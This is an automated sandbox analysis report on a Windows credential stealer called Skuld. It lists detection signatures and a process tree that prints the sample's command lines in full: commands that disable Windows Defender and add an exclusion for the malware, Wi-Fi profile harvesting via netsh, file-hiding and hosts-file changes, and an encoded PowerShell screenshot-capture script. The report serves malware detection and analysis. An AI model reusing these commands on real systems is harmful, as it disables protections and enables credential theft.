Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
skuld.exe

Overview

General Information

Sample name:skuld.exe
Analysis ID:1636046
MD5:1b19480e05b72abb96aafdf9625b5646
SHA1:38a12185fcedf55ecb219e684206a733fff2cd7b
SHA256:40a684ff28f001ad2b3aaa501d2eade9aaf94fe6951eea52239f39835e6c7e37
Infos:

Detection

Go Stealer, Skuld Stealer
Score:100
Range:0 - 100
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Yara detected Go Stealer
Yara detected Skuld Stealer
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Check if machine is in data center or colocation facility
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Installs new ROOT certificates
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Modifies Windows Defender protection settings
Modifies the hosts file
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Tries to delay execution (extensive OutputDebugStringW loop)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Tries to steal communication platform credentials (via file / registry access)
Uses cmd line tools excessively to alter registry or file data
Uses netsh to modify the Windows network and firewall settings
Abnormal high CPU Usage
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates or modifies windows services
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Execution of Powershell with Base64
Stores large binary data to the registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64_ra
  • skuld.exe (PID: 7148 cmdline: "C:\Users\user\Desktop\skuld.exe" MD5: 1B19480E05B72ABB96AAFDF9625B5646)
    • conhost.exe (PID: 7156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 364 cmdline: attrib +h +s C:\Users\user\Desktop\skuld.exe MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
    • attrib.exe (PID: 736 cmdline: attrib +h +s C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
    • WMIC.exe (PID: 1172 cmdline: wmic csproduct get UUID MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • WMIC.exe (PID: 768 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • powershell.exe (PID: 3724 cmdline: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\skuld.exe MD5: 04029E121A0CFA5991749937DD22A1D9)
    • WMIC.exe (PID: 3216 cmdline: wmic os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • WMIC.exe (PID: 2372 cmdline: wmic cpu get Name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • WMIC.exe (PID: 2896 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • WMIC.exe (PID: 3928 cmdline: wmic csproduct get UUID MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • netsh.exe (PID: 5464 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
    • powershell.exe (PID: 5196 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA= MD5: 04029E121A0CFA5991749937DD22A1D9)
      • csc.exe (PID: 1800 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dh1o0wbe\dh1o0wbe.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
        • cvtres.exe (PID: 5840 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD9F3.tmp" "c:\Users\user\AppData\Local\Temp\dh1o0wbe\CSC88D051478A0408BB4BF8545E397BDC4.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • powershell.exe (PID: 2108 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)
    • attrib.exe (PID: 5152 cmdline: attrib -r C:\Windows\System32\drivers\etc\hosts MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
    • attrib.exe (PID: 6464 cmdline: attrib +r C:\Windows\System32\drivers\etc\hosts MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
skuld.exeJoeSecurity_GoStealerYara detected Go StealerJoe Security
    skuld.exeJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      skuld.exeJoeSecurity_SkuldStealerYara detected Skuld StealerJoe Security

        Dropped Files

        SourceRuleDescriptionAuthorStrings
        C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exeJoeSecurity_GoStealerYara detected Go StealerJoe Security
          C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exeJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exeJoeSecurity_SkuldStealerYara detected Skuld StealerJoe Security

              Memory Dumps

              SourceRuleDescriptionAuthorStrings
              00000000.00000000.1453903511.0000000000E47000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                00000000.00000000.1453903511.0000000000E47000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_SkuldStealerYara detected Skuld StealerJoe Security
                  Process Memory Space: skuld.exe PID: 7148JoeSecurity_GoStealerYara detected Go StealerJoe Security
                    Process Memory Space: skuld.exe PID: 7148JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                      Process Memory Space: skuld.exe PID: 7148JoeSecurity_SkuldStealerYara detected Skuld StealerJoe Security

                        Sigma Signatures

                        System Summary

                        barindex
                        Sigma detected: Files With System Process Name In Unsuspected Locations
                        Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\skuld.exe, ProcessId: 7148, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
                        Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\skuld.exe, CommandLine: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\skuld.exe, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\skuld.exe", ParentImage: C:\Users\user\Desktop\skuld.exe, ParentProcessId: 7148, ParentProcessName: skuld.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\skuld.exe, ProcessId: 3724, ProcessName: powershell.exe
                        Sigma detected: Powershell Defender Disable Scan Feature
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\skuld.exe", ParentImage: C:\Users\user\Desktop\skuld.exe, ParentProcessId: 7148, ParentProcessName: skuld.exe, ProcessCommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, ProcessId: 2108, ProcessName: powershell.exe
                        Sigma detected: Suspicious Encoded PowerShell Command Line
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
                        Sigma detected: Suspicious PowerShell Encoded Command Patterns
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
                        Sigma detected: Change PowerShell Policies to an Insecure Level
                        Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7A